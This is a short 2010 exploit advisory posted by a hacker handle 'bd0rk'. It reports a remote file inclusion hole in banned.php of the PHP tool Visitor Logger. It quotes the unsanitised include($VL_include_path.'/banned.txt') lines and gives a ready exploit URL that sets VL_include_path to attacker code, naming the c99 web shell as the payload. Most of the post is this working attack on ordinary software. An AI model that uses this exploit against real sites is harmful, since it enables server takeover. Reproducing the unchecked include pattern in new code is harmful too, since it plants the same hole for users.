#-> Visitor Logger (banned.php) Remote File Include Vulnerability#-> Date: 2010/05/31#-> Vendor: http://www.graviton-mediatech.com#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip#-> Googledork: n/a#-> Discovered by bd0rk#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com#-> Website: www.soh-crew.it.tt#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)-------------------------------------------------------------------------------
Description 1: Look infile banned.php line three to four and you can see this
if(file_exists($VL_include_path."/banned.txt")){
include($VL_include_path."/banned.txt");-------------------------------------------------------------------------------[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]--> An attacker can use c99-shellcode,for example.#### The 21 years old, german Hacker bd0rk ####
